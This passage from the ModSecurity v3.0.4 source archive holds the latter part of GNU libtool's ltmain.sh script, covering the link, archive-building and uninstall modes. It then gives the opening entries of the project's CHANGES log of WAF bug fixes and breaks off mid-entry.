$LN_S "$realname" "$linkname")' 'exit $?' fi done # If -module or -export-dynamic was specified, set the dlname. if test yes = "$module" || test yes = "$export_dynamic"; then # On all known operating systems, these are identical. dlname=$soname fi fi ;; obj) if test -n "$dlfiles$dlprefiles" || test no != "$dlself"; then func_warning "'-dlopen' is ignored for objects" fi case " $deplibs" in *\ -l* | *\ -L*) func_warning "'-l' and '-L' are ignored for objects" ;; esac test -n "$rpath" && \ func_warning "'-rpath' is ignored for objects" test -n "$xrpath" && \ func_warning "'-R' is ignored for objects" test -n "$vinfo" && \ func_warning "'-version-info' is ignored for objects" test -n "$release" && \ func_warning "'-release' is ignored for objects" case $output in *.lo) test -n "$objs$old_deplibs" && \ func_fatal_error "cannot build library object '$output' from non-libtool objects" libobj=$output func_lo2o "$libobj" obj=$func_lo2o_result ;; *) libobj= obj=$output ;; esac # Delete the old objects. $opt_dry_run || $RM $obj $libobj # Objects from convenience libraries. This assumes # single-version convenience libraries. Whenever we create # different ones for PIC/non-PIC, this we'll have to duplicate # the extraction. reload_conv_objs= gentop= # if reload_cmds runs $LD directly, get rid of -Wl from # whole_archive_flag_spec and hope we can get by with turning comma # into space. case $reload_cmds in *\$LD[\ \$]*) wl= ;; esac if test -n "$convenience"; then if test -n "$whole_archive_flag_spec"; then eval tmp_whole_archive_flags=\"$whole_archive_flag_spec\" test -n "$wl" || tmp_whole_archive_flags=`$ECHO "$tmp_whole_archive_flags" | $SED 's|,| |g'` reload_conv_objs=$reload_objs\ $tmp_whole_archive_flags else gentop=$output_objdir/${obj}x func_append generated " $gentop" func_extract_archives $gentop $convenience reload_conv_objs="$reload_objs $func_extract_archives_result" fi fi # If we're not building shared, we need to use non_pic_objs test yes = "$build_libtool_libs" || libobjs=$non_pic_objects # Create the old-style object. reload_objs=$objs$old_deplibs' '`$ECHO "$libobjs" | $SP2NL | $SED "/\.$libext$/d; /\.lib$/d; $lo2o" | $NL2SP`' '$reload_conv_objs output=$obj func_execute_cmds "$reload_cmds" 'exit $?' # Exit if we aren't doing a library object file. if test -z "$libobj"; then if test -n "$gentop"; then func_show_eval '${RM}r "$gentop"' fi exit $EXIT_SUCCESS fi test yes = "$build_libtool_libs" || { if test -n "$gentop"; then func_show_eval '${RM}r "$gentop"' fi # Create an invalid libtool object if no PIC, so that we don't # accidentally link it into a program. # $show "echo timestamp > $libobj" # $opt_dry_run || eval "echo timestamp > $libobj" || exit $? exit $EXIT_SUCCESS } if test -n "$pic_flag" || test default != "$pic_mode"; then # Only do commands if we really have different PIC objects. reload_objs="$libobjs $reload_conv_objs" output=$libobj func_execute_cmds "$reload_cmds" 'exit $?' fi if test -n "$gentop"; then func_show_eval '${RM}r "$gentop"' fi exit $EXIT_SUCCESS ;; prog) case $host in *cygwin*) func_stripname '' '.exe' "$output" output=$func_stripname_result.exe;; esac test -n "$vinfo" && \ func_warning "'-version-info' is ignored for programs" test -n "$release" && \ func_warning "'-release' is ignored for programs" $preload \ && test unknown,unknown,unknown = "$dlopen_support,$dlopen_self,$dlopen_self_static" \ && func_warning "'LT_INIT([dlopen])' not used. Assuming no dlopen support." case $host in *-*-rhapsody* | *-*-darwin1.[012]) # On Rhapsody replace the C library is the System framework compile_deplibs=`$ECHO " $compile_deplibs" | $SED 's/ -lc / System.ltframework /'` finalize_deplibs=`$ECHO " $finalize_deplibs" | $SED 's/ -lc / System.ltframework /'` ;; esac case $host in *-*-darwin*) # Don't allow lazy linking, it breaks C++ global constructors # But is supposedly fixed on 10.4 or later (yay!). if test CXX = "$tagname"; then case ${MACOSX_DEPLOYMENT_TARGET-10.0} in 10.[0123]) func_append compile_command " $wl-bind_at_load" func_append finalize_command " $wl-bind_at_load" ;; esac fi # Time to change all our "foo.ltframework" stuff back to "-framework foo" compile_deplibs=`$ECHO " $compile_deplibs" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'` finalize_deplibs=`$ECHO " $finalize_deplibs" | $SED 's% \([^ $]*\).ltframework% -framework \1%g'` ;; esac # move library search paths that coincide with paths to not yet # installed libraries to the beginning of the library search list new_libs= for path in $notinst_path; do case " $new_libs " in *" -L$path/$objdir "*) ;; *) case " $compile_deplibs " in *" -L$path/$objdir "*) func_append new_libs " -L$path/$objdir" ;; esac ;; esac done for deplib in $compile_deplibs; do case $deplib in -L*) case " $new_libs " in *" $deplib "*) ;; *) func_append new_libs " $deplib" ;; esac ;; *) func_append new_libs " $deplib" ;; esac done compile_deplibs=$new_libs func_append compile_command " $compile_deplibs" func_append finalize_command " $finalize_deplibs" if test -n "$rpath$xrpath"; then # If the user specified any rpath flags, then add them. for libdir in $rpath $xrpath; do # This is the magic to use -rpath. case "$finalize_rpath " in *" $libdir "*) ;; *) func_append finalize_rpath " $libdir" ;; esac done fi # Now hardcode the library paths rpath= hardcode_libdirs= for libdir in $compile_rpath $finalize_rpath; do if test -n "$hardcode_libdir_flag_spec"; then if test -n "$hardcode_libdir_separator"; then if test -z "$hardcode_libdirs"; then hardcode_libdirs=$libdir else # Just accumulate the unique libdirs. case $hardcode_libdir_separator$hardcode_libdirs$hardcode_libdir_separator in *"$hardcode_libdir_separator$libdir$hardcode_libdir_separator"*) ;; *) func_append hardcode_libdirs "$hardcode_libdir_separator$libdir" ;; esac fi else eval flag=\"$hardcode_libdir_flag_spec\" func_append rpath " $flag" fi elif test -n "$runpath_var"; then case "$perm_rpath " in *" $libdir "*) ;; *) func_append perm_rpath " $libdir" ;; esac fi case $host in *-*-cygwin* | *-*-mingw* | *-*-pw32* | *-*-os2* | *-cegcc*) testbindir=`$ECHO "$libdir" | $SED -e 's*/lib$*/bin*'` case :$dllsearchpath: in *":$libdir:"*) ;; ::) dllsearchpath=$libdir;; *) func_append dllsearchpath ":$libdir";; esac case :$dllsearchpath: in *":$testbindir:"*) ;; ::) dllsearchpath=$testbindir;; *) func_append dllsearchpath ":$testbindir";; esac ;; esac done # Substitute the hardcoded libdirs into the rpath. if test -n "$hardcode_libdir_separator" && test -n "$hardcode_libdirs"; then libdir=$hardcode_libdirs eval rpath=\" $hardcode_libdir_flag_spec\" fi compile_rpath=$rpath rpath= hardcode_libdirs= for libdir in $finalize_rpath; do if test -n "$hardcode_libdir_flag_spec"; then if test -n "$hardcode_libdir_separator"; then if test -z "$hardcode_libdirs"; then hardcode_libdirs=$libdir else # Just accumulate the unique libdirs. case $hardcode_libdir_separator$hardcode_libdirs$hardcode_libdir_separator in *"$hardcode_libdir_separator$libdir$hardcode_libdir_separator"*) ;; *) func_append hardcode_libdirs "$hardcode_libdir_separator$libdir" ;; esac fi else eval flag=\"$hardcode_libdir_flag_spec\" func_append rpath " $flag" fi elif test -n "$runpath_var"; then case "$finalize_perm_rpath " in *" $libdir "*) ;; *) func_append finalize_perm_rpath " $libdir" ;; esac fi done # Substitute the hardcoded libdirs into the rpath. if test -n "$hardcode_libdir_separator" && test -n "$hardcode_libdirs"; then libdir=$hardcode_libdirs eval rpath=\" $hardcode_libdir_flag_spec\" fi finalize_rpath=$rpath if test -n "$libobjs" && test yes = "$build_old_libs"; then # Transform all the library objects into standard objects. compile_command=`$ECHO "$compile_command" | $SP2NL | $SED "$lo2o" | $NL2SP` finalize_command=`$ECHO "$finalize_command" | $SP2NL | $SED "$lo2o" | $NL2SP` fi func_generate_dlsyms "$outputname" "@PROGRAM@" false # template prelinking step if test -n "$prelink_cmds"; then func_execute_cmds "$prelink_cmds" 'exit $?' fi wrappers_required=: case $host in *cegcc* | *mingw32ce*) # Disable wrappers for cegcc and mingw32ce hosts, we are cross compiling anyway. wrappers_required=false ;; *cygwin* | *mingw* ) test yes = "$build_libtool_libs" || wrappers_required=false ;; *) if test no = "$need_relink" || test yes != "$build_libtool_libs"; then wrappers_required=false fi ;; esac $wrappers_required || { # Replace the output file specification. compile_command=`$ECHO "$compile_command" | $SED 's%@OUTPUT@%'"$output"'%g'` link_command=$compile_command$compile_rpath # We have no uninstalled library dependencies, so finalize right now. exit_status=0 func_show_eval "$link_command" 'exit_status=$?' if test -n "$postlink_cmds"; then func_to_tool_file "$output" postlink_cmds=`func_echo_all "$postlink_cmds" | $SED -e 's%@OUTPUT@%'"$output"'%g' -e 's%@TOOL_OUTPUT@%'"$func_to_tool_file_result"'%g'` func_execute_cmds "$postlink_cmds" 'exit $?' fi # Delete the generated files. if test -f "$output_objdir/${outputname}S.$objext"; then func_show_eval '$RM "$output_objdir/${outputname}S.$objext"' fi exit $exit_status } if test -n "$compile_shlibpath$finalize_shlibpath"; then compile_command="$shlibpath_var=\"$compile_shlibpath$finalize_shlibpath\$$shlibpath_var\" $compile_command" fi if test -n "$finalize_shlibpath"; then finalize_command="$shlibpath_var=\"$finalize_shlibpath\$$shlibpath_var\" $finalize_command" fi compile_var= finalize_var= if test -n "$runpath_var"; then if test -n "$perm_rpath"; then # We should set the runpath_var. rpath= for dir in $perm_rpath; do func_append rpath "$dir:" done compile_var="$runpath_var=\"$rpath\$$runpath_var\" " fi if test -n "$finalize_perm_rpath"; then # We should set the runpath_var. rpath= for dir in $finalize_perm_rpath; do func_append rpath "$dir:" done finalize_var="$runpath_var=\"$rpath\$$runpath_var\" " fi fi if test yes = "$no_install"; then # We don't need to create a wrapper script. link_command=$compile_var$compile_command$compile_rpath # Replace the output file specification. link_command=`$ECHO "$link_command" | $SED 's%@OUTPUT@%'"$output"'%g'` # Delete the old output file. $opt_dry_run || $RM $output # Link the executable and exit func_show_eval "$link_command" 'exit $?' if test -n "$postlink_cmds"; then func_to_tool_file "$output" postlink_cmds=`func_echo_all "$postlink_cmds" | $SED -e 's%@OUTPUT@%'"$output"'%g' -e 's%@TOOL_OUTPUT@%'"$func_to_tool_file_result"'%g'` func_execute_cmds "$postlink_cmds" 'exit $?' fi exit $EXIT_SUCCESS fi case $hardcode_action,$fast_install in relink,*) # Fast installation is not supported link_command=$compile_var$compile_command$compile_rpath relink_command=$finalize_var$finalize_command$finalize_rpath func_warning "this platform does not like uninstalled shared libraries" func_warning "'$output' will be relinked during installation" ;; *,yes) link_command=$finalize_var$compile_command$finalize_rpath relink_command=`$ECHO "$compile_var$compile_command$compile_rpath" | $SED 's%@OUTPUT@%\$progdir/\$file%g'` ;; *,no) link_command=$compile_var$compile_command$compile_rpath relink_command=$finalize_var$finalize_command$finalize_rpath ;; *,needless) link_command=$finalize_var$compile_command$finalize_rpath relink_command= ;; esac # Replace the output file specification. link_command=`$ECHO "$link_command" | $SED 's%@OUTPUT@%'"$output_objdir/$outputname"'%g'` # Delete the old output files. $opt_dry_run || $RM $output $output_objdir/$outputname $output_objdir/lt-$outputname func_show_eval "$link_command" 'exit $?' if test -n "$postlink_cmds"; then func_to_tool_file "$output_objdir/$outputname" postlink_cmds=`func_echo_all "$postlink_cmds" | $SED -e 's%@OUTPUT@%'"$output_objdir/$outputname"'%g' -e 's%@TOOL_OUTPUT@%'"$func_to_tool_file_result"'%g'` func_execute_cmds "$postlink_cmds" 'exit $?' fi # Now create the wrapper script. func_verbose "creating $output" # Quote the relink command for shipping. if test -n "$relink_command"; then # Preserve any variables that may affect compiler behavior for var in $variables_saved_for_relink; do if eval test -z \"\${$var+set}\"; then relink_command="{ test -z \"\${$var+set}\" || $lt_unset $var || { $var=; export $var; }; }; $relink_command" elif eval var_value=\$$var; test -z "$var_value"; then relink_command="$var=; export $var; $relink_command" else func_quote_arg pretty "$var_value" relink_command="$var=$func_quote_arg_result; export $var; $relink_command" fi done func_quote eval cd "`pwd`" func_quote_arg pretty,unquoted "($func_quote_result; $relink_command)" relink_command=$func_quote_arg_unquoted_result fi # Only actually do things if not in dry run mode. $opt_dry_run || { # win32 will think the script is a binary if it has # a .exe suffix, so we strip it off here. case $output in *.exe) func_stripname '' '.exe' "$output" output=$func_stripname_result ;; esac # test for cygwin because mv fails w/o .exe extensions case $host in *cygwin*) exeext=.exe func_stripname '' '.exe' "$outputname" outputname=$func_stripname_result ;; *) exeext= ;; esac case $host in *cygwin* | *mingw* ) func_dirname_and_basename "$output" "" "." output_name=$func_basename_result output_path=$func_dirname_result cwrappersource=$output_path/$objdir/lt-$output_name.c cwrapper=$output_path/$output_name.exe $RM $cwrappersource $cwrapper trap "$RM $cwrappersource $cwrapper; exit $EXIT_FAILURE" 1 2 15 func_emit_cwrapperexe_src > $cwrappersource # The wrapper executable is built using the $host compiler, # because it contains $host paths and files. If cross- # compiling, it, like the target executable, must be # executed on the $host or under an emulation environment. $opt_dry_run || { $LTCC $LTCFLAGS -o $cwrapper $cwrappersource $STRIP $cwrapper } # Now, create the wrapper script for func_source use: func_ltwrapper_scriptname $cwrapper $RM $func_ltwrapper_scriptname_result trap "$RM $func_ltwrapper_scriptname_result; exit $EXIT_FAILURE" 1 2 15 $opt_dry_run || { # note: this script will not be executed, so do not chmod. if test "x$build" = "x$host"; then $cwrapper --lt-dump-script > $func_ltwrapper_scriptname_result else func_emit_wrapper no > $func_ltwrapper_scriptname_result fi } ;; * ) $RM $output trap "$RM $output; exit $EXIT_FAILURE" 1 2 15 func_emit_wrapper no > $output chmod +x $output ;; esac } exit $EXIT_SUCCESS ;; esac # See if we need to build an old-fashioned archive. for oldlib in $oldlibs; do case $build_libtool_libs in convenience) oldobjs="$libobjs_save $symfileobj" addlibs=$convenience build_libtool_libs=no ;; module) oldobjs=$libobjs_save addlibs=$old_convenience build_libtool_libs=no ;; *) oldobjs="$old_deplibs $non_pic_objects" $preload && test -f "$symfileobj" \ && func_append oldobjs " $symfileobj" addlibs=$old_convenience ;; esac if test -n "$addlibs"; then gentop=$output_objdir/${outputname}x func_append generated " $gentop" func_extract_archives $gentop $addlibs func_append oldobjs " $func_extract_archives_result" fi # Do each command in the archive commands. if test -n "$old_archive_from_new_cmds" && test yes = "$build_libtool_libs"; then cmds=$old_archive_from_new_cmds else # Add any objects from preloaded convenience libraries if test -n "$dlprefiles"; then gentop=$output_objdir/${outputname}x func_append generated " $gentop" func_extract_archives $gentop $dlprefiles func_append oldobjs " $func_extract_archives_result" fi # POSIX demands no paths to be encoded in archives. We have # to avoid creating archives with duplicate basenames if we # might have to extract them afterwards, e.g., when creating a # static archive out of a convenience library, or when linking # the entirety of a libtool archive into another (currently # not supported by libtool). if (for obj in $oldobjs do func_basename "$obj" $ECHO "$func_basename_result" done | sort | sort -uc >/dev/null 2>&1); then : else echo "copying selected object files to avoid basename conflicts..." gentop=$output_objdir/${outputname}x func_append generated " $gentop" func_mkdir_p "$gentop" save_oldobjs=$oldobjs oldobjs= counter=1 for obj in $save_oldobjs do func_basename "$obj" objbase=$func_basename_result case " $oldobjs " in " ") oldobjs=$obj ;; *[\ /]"$objbase "*) while :; do # Make sure we don't pick an alternate name that also # overlaps. newobj=lt$counter-$objbase func_arith $counter + 1 counter=$func_arith_result case " $oldobjs " in *[\ /]"$newobj "*) ;; *) if test ! -f "$gentop/$newobj"; then break; fi ;; esac done func_show_eval "ln $obj $gentop/$newobj || cp $obj $gentop/$newobj" func_append oldobjs " $gentop/$newobj" ;; *) func_append oldobjs " $obj" ;; esac done fi func_to_tool_file "$oldlib" func_convert_file_msys_to_w32 tool_oldlib=$func_to_tool_file_result eval cmds=\"$old_archive_cmds\" func_len " $cmds" len=$func_len_result if test "$len" -lt "$max_cmd_len" || test "$max_cmd_len" -le -1; then cmds=$old_archive_cmds elif test -n "$archiver_list_spec"; then func_verbose "using command file archive linking..." for obj in $oldobjs do func_to_tool_file "$obj" $ECHO "$func_to_tool_file_result" done > $output_objdir/$libname.libcmd func_to_tool_file "$output_objdir/$libname.libcmd" oldobjs=" $archiver_list_spec$func_to_tool_file_result" cmds=$old_archive_cmds else # the command line is too long to link in one step, link in parts func_verbose "using piecewise archive linking..." save_RANLIB=$RANLIB RANLIB=: objlist= concat_cmds= save_oldobjs=$oldobjs oldobjs= # Is there a better way of finding the last object in the list? for obj in $save_oldobjs do last_oldobj=$obj done eval test_cmds=\"$old_archive_cmds\" func_len " $test_cmds" len0=$func_len_result len=$len0 for obj in $save_oldobjs do func_len " $obj" func_arith $len + $func_len_result len=$func_arith_result func_append objlist " $obj" if test "$len" -lt "$max_cmd_len"; then : else # the above command should be used before it gets too long oldobjs=$objlist if test "$obj" = "$last_oldobj"; then RANLIB=$save_RANLIB fi test -z "$concat_cmds" || concat_cmds=$concat_cmds~ eval concat_cmds=\"\$concat_cmds$old_archive_cmds\" objlist= len=$len0 fi done RANLIB=$save_RANLIB oldobjs=$objlist if test -z "$oldobjs"; then eval cmds=\"\$concat_cmds\" else eval cmds=\"\$concat_cmds~\$old_archive_cmds\" fi fi fi func_execute_cmds "$cmds" 'exit $?' done test -n "$generated" && \ func_show_eval "${RM}r$generated" # Now create the libtool archive. case $output in *.la) old_library= test yes = "$build_old_libs" && old_library=$libname.$libext func_verbose "creating $output" # Preserve any variables that may affect compiler behavior for var in $variables_saved_for_relink; do if eval test -z \"\${$var+set}\"; then relink_command="{ test -z \"\${$var+set}\" || $lt_unset $var || { $var=; export $var; }; }; $relink_command" elif eval var_value=\$$var; test -z "$var_value"; then relink_command="$var=; export $var; $relink_command" else func_quote_arg pretty,unquoted "$var_value" relink_command="$var=$func_quote_arg_unquoted_result; export $var; $relink_command" fi done # Quote the link command for shipping. func_quote eval cd "`pwd`" relink_command="($func_quote_result; $SHELL \"$progpath\" $preserve_args --mode=relink $libtool_args @inst_prefix_dir@)" func_quote_arg pretty,unquoted "$relink_command" relink_command=$func_quote_arg_unquoted_result if test yes = "$hardcode_automatic"; then relink_command= fi # Only create the output if not a dry run. $opt_dry_run || { for installed in no yes; do if test yes = "$installed"; then if test -z "$install_libdir"; then break fi output=$output_objdir/${outputname}i # Replace all uninstalled libtool libraries with the installed ones newdependency_libs= for deplib in $dependency_libs; do case $deplib in *.la) func_basename "$deplib" name=$func_basename_result func_resolve_sysroot "$deplib" eval libdir=`$SED -n -e 's/^libdir=\(.*\)$/\1/p' $func_resolve_sysroot_result` test -z "$libdir" && \ func_fatal_error "'$deplib' is not a valid libtool archive" func_append newdependency_libs " ${lt_sysroot:+=}$libdir/$name" ;; -L*) func_stripname -L '' "$deplib" func_replace_sysroot "$func_stripname_result" func_append newdependency_libs " -L$func_replace_sysroot_result" ;; -R*) func_stripname -R '' "$deplib" func_replace_sysroot "$func_stripname_result" func_append newdependency_libs " -R$func_replace_sysroot_result" ;; *) func_append newdependency_libs " $deplib" ;; esac done dependency_libs=$newdependency_libs newdlfiles= for lib in $dlfiles; do case $lib in *.la) func_basename "$lib" name=$func_basename_result eval libdir=`$SED -n -e 's/^libdir=\(.*\)$/\1/p' $lib` test -z "$libdir" && \ func_fatal_error "'$lib' is not a valid libtool archive" func_append newdlfiles " ${lt_sysroot:+=}$libdir/$name" ;; *) func_append newdlfiles " $lib" ;; esac done dlfiles=$newdlfiles newdlprefiles= for lib in $dlprefiles; do case $lib in *.la) # Only pass preopened files to the pseudo-archive (for # eventual linking with the app. that links it) if we # didn't already link the preopened objects directly into # the library: func_basename "$lib" name=$func_basename_result eval libdir=`$SED -n -e 's/^libdir=\(.*\)$/\1/p' $lib` test -z "$libdir" && \ func_fatal_error "'$lib' is not a valid libtool archive" func_append newdlprefiles " ${lt_sysroot:+=}$libdir/$name" ;; esac done dlprefiles=$newdlprefiles else newdlfiles= for lib in $dlfiles; do case $lib in [\\/]* | [A-Za-z]:[\\/]*) abs=$lib ;; *) abs=`pwd`"/$lib" ;; esac func_append newdlfiles " $abs" done dlfiles=$newdlfiles newdlprefiles= for lib in $dlprefiles; do case $lib in [\\/]* | [A-Za-z]:[\\/]*) abs=$lib ;; *) abs=`pwd`"/$lib" ;; esac func_append newdlprefiles " $abs" done dlprefiles=$newdlprefiles fi $RM $output # place dlname in correct position for cygwin # In fact, it would be nice if we could use this code for all target # systems that can't hard-code library paths into their executables # and that have no shared library path variable independent of PATH, # but it turns out we can't easily determine that from inspecting # libtool variables, so we have to hard-code the OSs to which it # applies here; at the moment, that means platforms that use the PE # object format with DLL files. See the long comment at the top of # tests/bindir.at for full details. tdlname=$dlname case $host,$output,$installed,$module,$dlname in *cygwin*,*lai,yes,no,*.dll | *mingw*,*lai,yes,no,*.dll | *cegcc*,*lai,yes,no,*.dll) # If a -bindir argument was supplied, place the dll there. if test -n "$bindir"; then func_relative_path "$install_libdir" "$bindir" tdlname=$func_relative_path_result/$dlname else # Otherwise fall back on heuristic. tdlname=../bin/$dlname fi ;; esac $ECHO > $output "\ # $outputname - a libtool library file # Generated by $PROGRAM (GNU $PACKAGE) $VERSION # # Please DO NOT delete this file! # It is necessary for linking the library. # The name that we can dlopen(3). dlname='$tdlname' # Names of this library. library_names='$library_names' # The name of the static archive. old_library='$old_library' # Linker flags that cannot go in dependency_libs. inherited_linker_flags='$new_inherited_linker_flags' # Libraries that this one depends upon. dependency_libs='$dependency_libs' # Names of additional weak libraries provided by this library weak_library_names='$weak_libs' # Version information for $libname. current=$current age=$age revision=$revision # Is this an already installed library? installed=$installed # Should we warn about portability when linking against -modules? shouldnotlink=$module # Files to dlopen/dlpreopen dlopen='$dlfiles' dlpreopen='$dlprefiles' # Directory that this library needs to be installed in: libdir='$install_libdir'" if test no,yes = "$installed,$need_relink"; then $ECHO >> $output "\ relink_command=\"$relink_command\"" fi done } # Do a symbolic link so that the libtool archive can be found in # LD_LIBRARY_PATH before the program is installed. func_show_eval '( cd "$output_objdir" && $RM "$outputname" && $LN_S "../$outputname" "$outputname" )' 'exit $?' ;; esac exit $EXIT_SUCCESS } if test link = "$opt_mode" || test relink = "$opt_mode"; then func_mode_link ${1+"$@"} fi # func_mode_uninstall arg... func_mode_uninstall () { $debug_cmd RM=$nonopt files= rmforce=false exit_status=0 # This variable tells wrapper scripts just to set variables rather # than running their programs. libtool_install_magic=$magic for arg do case $arg in -f) func_append RM " $arg"; rmforce=: ;; -*) func_append RM " $arg" ;; *) func_append files " $arg" ;; esac done test -z "$RM" && \ func_fatal_help "you must specify an RM program" rmdirs= for file in $files; do func_dirname "$file" "" "." dir=$func_dirname_result if test . = "$dir"; then odir=$objdir else odir=$dir/$objdir fi func_basename "$file" name=$func_basename_result test uninstall = "$opt_mode" && odir=$dir # Remember odir for removal later, being careful to avoid duplicates if test clean = "$opt_mode"; then case " $rmdirs " in *" $odir "*) ;; *) func_append rmdirs " $odir" ;; esac fi # Don't error if the file doesn't exist and rm -f was used. if { test -L "$file"; } >/dev/null 2>&1 || { test -h "$file"; } >/dev/null 2>&1 || test -f "$file"; then : elif test -d "$file"; then exit_status=1 continue elif $rmforce; then continue fi rmfiles=$file case $name in *.la) # Possibly a libtool archive, so verify it. if func_lalib_p "$file"; then func_source $dir/$name # Delete the libtool libraries and symlinks. for n in $library_names; do func_append rmfiles " $odir/$n" done test -n "$old_library" && func_append rmfiles " $odir/$old_library" case $opt_mode in clean) case " $library_names " in *" $dlname "*) ;; *) test -n "$dlname" && func_append rmfiles " $odir/$dlname" ;; esac test -n "$libdir" && func_append rmfiles " $odir/$name $odir/${name}i" ;; uninstall) if test -n "$library_names"; then # Do each command in the postuninstall commands. func_execute_cmds "$postuninstall_cmds" '$rmforce || exit_status=1' fi if test -n "$old_library"; then # Do each command in the old_postuninstall commands. func_execute_cmds "$old_postuninstall_cmds" '$rmforce || exit_status=1' fi # FIXME: should reinstall the best remaining shared library. ;; esac fi ;; *.lo) # Possibly a libtool object, so verify it. if func_lalib_p "$file"; then # Read the .lo file func_source $dir/$name # Add PIC object to the list of files to remove. if test -n "$pic_object" && test none != "$pic_object"; then func_append rmfiles " $dir/$pic_object" fi # Add non-PIC object to the list of files to remove. if test -n "$non_pic_object" && test none != "$non_pic_object"; then func_append rmfiles " $dir/$non_pic_object" fi fi ;; *) if test clean = "$opt_mode"; then noexename=$name case $file in *.exe) func_stripname '' '.exe' "$file" file=$func_stripname_result func_stripname '' '.exe' "$name" noexename=$func_stripname_result # $file with .exe has already been added to rmfiles, # add $file without .exe func_append rmfiles " $file" ;; esac # Do a test to see if this is a libtool program. if func_ltwrapper_p "$file"; then if func_ltwrapper_executable_p "$file"; then func_ltwrapper_scriptname "$file" relink_command= func_source $func_ltwrapper_scriptname_result func_append rmfiles " $func_ltwrapper_scriptname_result" else relink_command= func_source $dir/$noexename fi # note $name still contains .exe if it was in $file originally # as does the version of $file that was added into $rmfiles func_append rmfiles " $odir/$name $odir/${name}S.$objext" if test yes = "$fast_install" && test -n "$relink_command"; then func_append rmfiles " $odir/lt-$name" fi if test "X$noexename" != "X$name"; then func_append rmfiles " $odir/lt-$noexename.c" fi fi fi ;; esac func_show_eval "$RM $rmfiles" 'exit_status=1' done # Try to remove the $objdir's in the directories where we deleted files for dir in $rmdirs; do if test -d "$dir"; then func_show_eval "rmdir $dir >/dev/null 2>&1" fi done exit $exit_status } if test uninstall = "$opt_mode" || test clean = "$opt_mode"; then func_mode_uninstall ${1+"$@"} fi test -z "$opt_mode" && { help=$generic_help func_fatal_help "you must specify a MODE" } test -z "$exec_cmd" && \ func_fatal_help "invalid operation mode '$opt_mode'" if test -n "$exec_cmd"; then eval exec "$exec_cmd" exit $EXIT_FAILURE fi exit $exit_status # The TAGs below are defined such that we never get into a situation # where we disable both kinds of libraries. Given conflicting # choices, we go for a static library, that is the most portable, # since we can't tell whether shared libraries were disabled because # the user asked for that or because the platform doesn't support # them. This is particularly important on AIX, because we don't # support having both static and shared libraries enabled at the same # time on that platform, so we default to a shared-only configuration. # If a disable-shared tag is given, we'll fallback to a static-only # configuration. But we'll never go from static-only to shared-only. # ### BEGIN LIBTOOL TAG CONFIG: disable-shared build_libtool_libs=no build_old_libs=yes # ### END LIBTOOL TAG CONFIG: disable-shared # ### BEGIN LIBTOOL TAG CONFIG: disable-static build_old_libs=`case $build_libtool_libs in yes) echo no;; *) echo yes;; esac` # ### END LIBTOOL TAG CONFIG: disable-static # Local Variables: # mode:shell-script # sh-indentation:2 # End: modsecurity-v3.0.4/CHANGES0000644000175000017500000004124013607066106015506 0ustar zimmerlezimmerlev3.0.4 - 2020-Jan-13 -------------------- - Fix: audit log data omitted when nolog,auditlog [@martinhsv] - Fix: ModSecurity 3.x inspectFile operator does not pass FILES_TMPNAMES parameter to lua engine [Issue #2204, #2205 - @kadirerdogan] - XML: Remove error messages from stderr [Issue #2010 - @JaiHarpalani, @zimmerle] - Filter comment or blank line for pmFromFile operator [Issue #1645 - @LeeShan87, @victorhora, @tdoubley] - Additional adjustment to Cookie header parsing [@martinhsv] - Restore chained rule part H logging to be more like 2.9 behaviour [Issue #2196 - @martinhsv] - Small fixes in log messages to help debugging the file upload [Issue #2130 - @airween] - Fix Cookie header parsing issues [Issue #2201 - @airween, @martinhsv] - Fix rules with nolog are logging to part H [Issue #2196 - @martinhsv] - Fix argument key-value pair parsing cases [Issue #1904 - @martinhsv] - Fix: audit log part for response body for JSON format to be E [Issue #2066 - @martinhsv, @zimmerle] - Make sure m_rulesMessages is filled after successfull match [Issue #2000, #2048 - @victorhora, @defanator] - Fix @pm lookup for possible matches on offset zero. [@zimmerle, @afoxdavidi, @martinhsv, @marshal09] - Regex lookup on the key name instead of COLLECTION:key [@rdiperri-yottaa, @danbiagini-work, @mmelo-yottaa, @zimmerle] - Missing throw in Operator::instantiate [Issue #2106 - @marduone] - Making block action execution dependent of the SecEngine status [Issue #2113, #2111 - @theMiddleBlue, @airween] - Making block action execution dependent of the SecEngine status [Issue #1960 - @theMiddleBlue, @zimmerle, @airween, @victorhora] - Having body limits to respect the rule engine state [@zimmerle] - Fix SecRuleUpdateTargetById does not match regular expressions [Issue #1872 - @zimmerle, @anush-cr, @victorhora, @j0k2r] - Adds missing check for runtime ctl:ruleRemoveByTag [Issue #2102, #2099 - @airween] - Adds a new operator verifySVNR that checks for Austrian social security numbers. [Issue #2063 - @Rufus125] - Fix variables output in debug logs [Issue #2057 - @jleproust] - Correct typo validade in log output [Issue #2059 - @nerrehmit] - fix/minor: Error encoding hexa decimal. [Issue #2068 - @tech-ozon-io] - Limit more log variables to 200 characters. [Issue #2073 - @jleproust] - parser: fix parsed file names [@zimmerle] - Allow empty anchored variable [Issue #2024 - @airween] - Fixed FILES_NAMES collection after the end of multipart parsing [Issue #2016 - @airween] - Fixed validateByteRange parsing method [Issue #2017 - @airween] - Removes a memory leak on the JSON parser [@zimmerle] - Enables LMDB on the regression tests. [Issue #2011, #2008 - @WGH-, @mdunc] - Fix: Extra whitespace in some configuration directives causing error [Issue #2006 - @porjo, @zimmerle] - Refactoring on Regex and SMatch classes. [@WGH-] - Fixed buffer overflow in Utils::Md5::hexdigest() [Issue #2002 - @defanator] - Implemented merge() method for ConfigInt, ConfigDouble, ConfigString [Issue #1990 - @defanator] - Adds initially support to the drop action. [@zimmerle] - Complete merging of particular rule properties [Issue #1978 - @defanator] - Replaces AC_CHECK_FILE with 'test -f' [Issue #1984 - @chuckwolber] - Fix inet addr handling on 64 bit big endian systems [Issue #1980 - @airween] - Fix tests on FreeBSD [Issue #1973 - @defanator] - Changes ENV test case to read the default MODSECURTIY env var [Issue #1969 - @zimmerle, @airween, @inittab] - Regression: Sets MODSECURITY env var during the tests execution [Issue #1969 - @zimmerle, @airween, @inittab] - Fix setenv action to strdup key=variable [@zimmerle] - Allow 0 length JSON requests. [Issue #1822 - @allanbomsft, @zimmerle, @victorhora, @marcstern] - Fix "make dist" target to include default configuration [Issue #1966 - @defanator] - Replaced log locking using mutex with fcntl lock [Issue #1949, #1927 - @Cloaked9000] - Correct the usage of modsecurity::Phases::NUMBER_OF_PHASES [Issue #1959 - @weliu] - Adds support to multiple ranges in ctl:ruleRemoveById [Issue #1956 - @theseion, @victorhora, @zimmerle] - Rule variable interpolation broken [Issue #1961 - @soonum, @zimmerle] - Make the boundary check less strict as per RFC2046 [Issue #1943 - @victorhora, @allanbomsft] - Fix buffer size for utf8toUnicode transformation [Issue #1208 - @katef, 